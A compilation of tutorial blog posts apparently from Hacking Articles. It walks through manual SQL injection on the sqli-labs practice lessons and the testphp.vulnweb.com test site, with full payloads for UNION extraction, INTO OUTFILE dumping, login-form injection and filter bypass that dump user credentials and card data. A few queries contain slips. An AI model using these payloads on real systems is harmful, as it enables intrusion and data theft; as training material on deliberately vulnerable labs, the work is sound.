Dumping Database using Outfile

In our previous  article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT…INTO OUTFILE statement is easiest way of exporting a table records into a text file or excel file

 This statement allows user to load table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the significant rows to a file, and gives authority to the use of column and row terminators to specify output format. The output file is created directly by the MySQL server, so the filename with path should be specify where user want the file to be written on the server host. The file must not exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-7/?id=1

From screenshot you can read “you are in….. Use outfile” now let’s try to break this statement.

OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1

After making lots of efforts finally successfully the query gets fixed, if noticed the step for SQL injection is similar as previous chapter only techniques to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1))    –+

Now following query will dump the result into a text file. Here you need to mention the path where user wants the file to be written on the server host. The file must not exist already on server user always use new text file for over writing database information.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,3 into outfile “/xampp/htdocs/sqli/Less-7/hack1.txt” –+

 From screenshot you can perceive that still it is showing error message now open another tab for the output of resultant query.

http://localhost:81/sqli/Less-7/

Now add file name hack1.txt to check output of above query.

http://localhost:81/sqli/Less-7/hack1.txt

hence you can see we get output of executed query inside text file. This will save hack1.txt file inside the server machine also.

Execute following query to retrieve database name using union injection using a new text file.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,database() into outfile “/xampp/htdocs/sqli/Less-7/hack2.txt” –+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database using another text file.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile “/xampp/htdocs/sqli/Less-7/hack3.txt” –+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’ into outfile “/xampp/htdocs/sqli/Less-7/hack4.txt” –+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.

C1: username

C2: password

At last execute following query to read all username and password inside the table users from inside its column.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(username),group_concat(password)from users into outfile “/xampp/htdocs/sqli/Less-7/hack5.txt” –+

http://localhost:81/sqli/Less-7/hack5.txt

From screenshot you can read the username and password save inside text file.

Note: you can try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Form Based SQL Injection Manually

In our previous article we had perform Form Based SQL injection using sqlmap but today we are going to perform Form Based SQL injection  in DHAKKAN manually. There are so many example related to login form like: Facebook login; Gmail login; other online accounts which may ask you to submit your information as username and password.

Let’s start!! 

LESSON 11

 This lesson is much similar to lesson 1,2,3,4 if you not familiar to these lessons then please go through it from here. You will come to know how to perform SQL Injection manually step by step in order to retrieve the data from inside the database system.

Lesson 11 is regarding POST error based single quotes (‘) string so when you will explore this lab on the browser you will observe that it contains text field for username and password to login inside web server. As we are not true user so we don’t know the correct username and password but being hacker we always wish to get inside the database with help of SQL injection. Therefore first we will test whether the database is vulnerable to SQL injection or not.

Since lesson itself sound as error based single quotes (‘) string, thus I had used single quotes () to break the query inside the text field of username then click on submit.

Username:      ’

 From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near ”” and password=” LIMIT 0,1’

Now we need to fix this query with help of # (hash) comment; so after adding single quotes (‘) add a hash function (#) to make it syntactically correct.

Username:  ‘   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

Username:  ‘ order by 1 #

Username:  ‘ order by 2 #

Username:  ‘ order by 3 #

 From screenshot you can see I received error at order by 3 which mean there are only two columns used in the backend query

Similarly insert query for union select in between and # to select both records.

Username:  ‘ union select 1,2 #

From screenshot you can see it also shown successfully logged in, now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security

Username:  ‘ union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  ‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query

Username:  ‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  ‘ union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about single quotes string error based injection in lesson 11.

Lesson 12

In some scenario you will try to use single quotes string for test SQL vulnerability or will go extend in order to break the query even after knowing that database is vulnerable but you will be not able to get break the query and receive error message because might the developer had blacklist the single quotes (‘) at the backend query.

Lesson 12 is similar to previous lesson 11 but here you will face failure if you used single quotes for breaking the query, since the chapter sound closed to post Error based double quotes string (“). Thus I had used double quotes () to break the query inside the text field of username then click on submit.

username: 

From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near ‘”””) and password=(“”) LIMIT 0,1’

Now we need to fix this query with help of ) closing parenthesis and  # (hash) comments; so after double quotes (“) add ) closing parenthesis  hash function (#) to make it syntactically correct.

username:  “)   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between ‘) and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

username:  “) order by 3 #

From screenshot you can see I received error at order by 3 which means there are only two columns used in the backend query

Similarly insert query for union select in between ‘)and # to select both records.

Username:  “) union select 1,2 #

 From screenshot you can see it also shown successfully logged in, let’s now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security

Username:  “) union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  “) union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query

Username:  “) union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  “) union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about double quotes string error based injection in lesson 12.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to Bypass SQL Injection Filter Manually

In previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. The reason behind that is the protection that developer had applied to prevent SQL injection, sometimes developer use filters to strip out few characters and OPERATORS from the user input before adding it to the query for SQL statement to prevent SQL Injection. Today’s article will help you to face such situations and will tell you how to bypass such filters. Here again we’ll be using DHAKKAN SQLI labs for practice.

 Let’s start!!

 LESSION 25

In Lab 25 OR and AND function are Blocked here we will try to bypass sql filter using their substitute.

function blacklist($id)

$id= preg_replace(‘/or/i’,””, $id);                              //strip out OR (non case sensitive)

$id= preg_replace(‘/AND/i’,””, $id);                         //Strip out AND (non case sensitive)

Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be no output therefore I had use %26%26 inside the query.

 Following are replacement for AND and OR

AND :   &&   %26%26 

OR  :  || 

Open the browser and type following SQL query  in URL

http://localhost:81/sqli/Less-25/?id=1′ %26%26 1=1 –+

From screenshot you can see we have successfully fixed the query for AND (&&) into URL encode as %26%26. Even when AND operator was filtered out.

Once the concept is clear to bypass AND filter later we need to alter the               SQL statement for retrieving database information.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,2,3 %26%26 1=1 –+   

Type following query to retrieve database name using union injection

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,database(),3 %26%26 1=1 –+

 hence you can see we have successfully get securtiy as database name as result.

 

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 –+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name=’users’ %26%26 1=1 –+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(username),3 from users –+

From screenshot you can read the fetched data.

Hence in lesson 25 we have learn how to bypass AND, OR filter for retrieving information inside the database.

LESSION 26

You will find lab 26 more challenging because here space,Comments,OR and AND are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

preg_replace(‘/or/i’,””, $id);                                       //strip out OR (non case sensitive)

$id= preg_replace(‘/and/i’,””, $id);                          //Strip out AND (non case sensitive)

$id= preg_replace(‘/[\/\*]/’,””, $id);                       //strip out /*

$id= preg_replace(‘/[–]/’,””, $id);                            //Strip out —

$id= preg_replace(‘/[#]/’,””, $id);                             //Strip out #

$id= preg_replace(‘/[\s]/’,””, $id);                            //Strip out spaces

$id= preg_replace(‘/[\/\\\\]/’,””, $id);    //Strip out slashes

This lab has more filters as compared to lab 25  because here space,Comments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-26/?id=1’%a0%26%26’1=1

From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0

Blanks = (‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’ ‘%a0’)

Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the                SQL statement for retrieving database information.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,2,3%a0%26%26’1=1

Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,database(),3%a0%26%26%’1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26’1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name=’users’%a0%26%26’1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0’1

Hence in lesson 26 we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and Comments are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

$id= preg_replace(‘/[\/\*]/’,””, $id);                       //strip out /*

$id= preg_replace(‘/[–]/’,””, $id);                            //Strip out –.

$id= preg_replace(‘/[#]/’,””, $id);                                             //Strip out #.

$id= preg_replace(‘/[ +]/’,””, $id);                //Strip out spaces.

$id= preg_replace(‘/select/m’,””, $id);       //Strip out spaces.

$id= preg_replace(‘/[ +]/’,””, $id);                //Strip out spaces.

$id= preg_replace(‘/union/s’,””, $id);         //Strip out union

$id= preg_replace(‘/select/s’,””, $id);         //Strip out select

$id= preg_replace(‘/UNION/s’,””, $id);      //Strip out UNION

$id= preg_replace(‘/SELECT/s’,””, $id);       //Strip out SELECT

$id= preg_replace(‘/Union/s’,””, $id);         //Strip out Union

$id= preg_replace(‘/Select/s’,””, $id);         //Strip out select

This lab has more filters in addtion to lab 26  because here union, select, space andComments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-27/?id=1′ AND’1=1

 

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1’%a0UnIon%a0SeLect%a01,2,3%a0AND’1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1’%a0UnIon%a0SeLect%a01,2,3%a0AND’1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Now Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,database(),3%a0AND’1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND’1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name=’users’%a0AND’1=1

 Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81//sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name=’users’%a0AND’1=1

 Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Manual SQL Injection Exploitation Step by Step

This article is based on our previous article where you have learned different techniques to perform SQL injection manually using dhakkan. Today we are again performing SQL injection manually on a live website “vulnweb.com” in order to reduce your stress of installing setup of dhakkan.

We are going to apply same concept and techniques as performed in Dhakkan on different the platform

 Let’s begin!

http://www.hackingarticles.in/beginner-guide-sql-injection-part-1/

Open given below targeted URL in the browser

http://testphp.vulnweb.com/artist.php?artist=1 So here we are going test SQL injection for “id=1

Now use error base technique by adding an apostrophe () symbol at the end of input which will try to break the query.

testphp.vulnweb.com/artists.php?artist=1′

In the given screenshot you can see we have got error message which means the running site is infected by SQL injection.

Now using ORDER BY keyword to sort the records in ascending or descending order for id=1

http://testphp.vulnweb.com/artists.php?artist=1 order by 1

Similarly repeating for order 2, 3 and so on one by one

http://testphp.vulnweb.com/artists.php?artist=1 order by 2

http://testphp.vulnweb.com/artists.php?artist=1 order by 4

From screenshot you can see we have got error at order by 4 which means it consist only three records.

Let’s penetrate more inside using union base injection to select statement from different table.

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3

 From screenshot you can see it is show result for only one table not for others.

Now try to pass wrong input into database through URL by replacing artist=1 from artist=-1 as given below:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

 Hence you can see now it is showing the result for remaining two tables also.

Use next query to fetch the name of database

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3

From screen shot you can read the database name acuart

Next query will extract current username as well as version of database system

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()

Here we have retrieve 5.1.73 0ubuntu0 10.04.1 as version and acuart@localhost as current user

Through next query we will try to fetch table name inside the database

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1

From screenshot you can name of first table is carts.

Similarly repeat the same query for another table with slight change

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 2: categ

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 

We got table 3: featured

Similarly repeat same query for table 4, 5, 6, and 7 with making slight changes in LIMIT.

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7: users

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1

Since we didn’t get anything when limit is set 8, 1 hence their might be 7 tables only inside the database.

concat function is use for concatenation of two or more string into single string.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

 From screen you can see through concat function we have successfully retrieve all table name inside the

database.

Table1: artist

Table2: Carts

Table3: Featured

Table4: Guestbook

Table5: Pictures

Table6: Product

Table7: users

May be we can get some important data from users table, so let’s penetrate more inside.  Again Use concat function for table users for retrieving its entire column names.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’

Awesome!!  We successfully retrieve all eight column names from inside the table users.

Then I have choose only four column i.e. uname, pass,email and cc for further enumeration.

Use concat function for selecting uname from table users by executing following query through URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users

 From screenshot you can read uname: test

Use concat function for selecting pass from table users by executing following query through URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users

 From screenshot you can read pass: test

Use concat function for selecting cc (credit card) from table users by executing following query through URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users

From screenshot you can read cc: 1234-5678-2300-9000

Use concat function for selecting email from table users by executing following query through URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users

From screenshot you can read email: jitendra@panalinks.com

 Enjoy hacking!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...